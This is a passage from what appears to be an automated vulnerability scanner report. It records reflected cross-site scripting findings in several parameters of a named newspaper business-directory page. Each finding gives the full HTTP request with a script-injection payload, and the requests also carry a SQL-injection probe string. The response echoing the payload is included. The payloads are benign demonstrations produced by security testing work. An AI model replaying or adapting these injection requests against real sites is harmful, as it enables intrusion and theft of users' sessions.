2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91512
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCCSTRAT=EHDDEGAAPAOIOIHOCHABCMIA; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsW" value="125-545138,125-561852,125-561853,125-561855,125-561856,125-561860,125-553593,125-561861,125-557156,125-561863dfb6b"><script>alert(1)</script>8166429791be06173">
...[SNIP]...

4.320. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsX parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsX request parameter is copied into the HTML document as plain text between tags. The payload b212b<script>alert(1)</script>0b3cf47bed5 was submitted in the sLsIdsX parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241b212b<script>alert(1)</script>0b3cf47bed5&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241b212b<script>alert(1)</script>0b3cf47bed5&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-
...[SNIP]...

4.321. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsX parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsX request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a14"><script>alert(1)</script>f1d64d91d871623a0 was submitted in the sLsIdsX parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-56224137a14"><script>alert(1)</script>f1d64d91d871623a0&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91520
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCCSTRAT=GHDDEGAAPHIOEBFLGLFFBFEA; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsX" value="125-560787,125-555117,125-555993,125-560783,125-558689,125-557187,125-557539,125-560788,125-560650,125-56224137a14"><script>alert(1)</script>f1d64d91d871623a0">
...[SNIP]...

4.322. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsY parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsY request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8ac"><script>alert(1)</script>79df5ec53e65a6bde was submitted in the sLsIdsY parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929ea8ac"><script>alert(1)</script>79df5ec53e65a6bde&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91440
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=BIIPGLGAPIFOAAPIIMEINGDL; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsY" value="125-564252,125-472625,125-565009,125-565408,125-565406,125-566364,125-566155,125-566429,125-569520,125-560929ea8ac"><script>alert(1)</script>79df5ec53e65a6bde">
...[SNIP]...

4.323. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsY parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsY request parameter is copied into the HTML document as plain text between tags. The payload d15b6<script>alert(1)</script>cdc723f989a was submitted in the sLsIdsY parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929d15b6<script>alert(1)</script>cdc723f989a&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Ar
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=KNOJLAHAPBANMCLFEGCGJJGG; path=/
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929d15b6<script>alert(1)</script>cdc723f989a&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Are
...[SNIP]...

4.324. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsZ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsZ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88ccf"><script>alert(1)</script>8405255afb38ea220 was submitted in the sLsIdsZ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

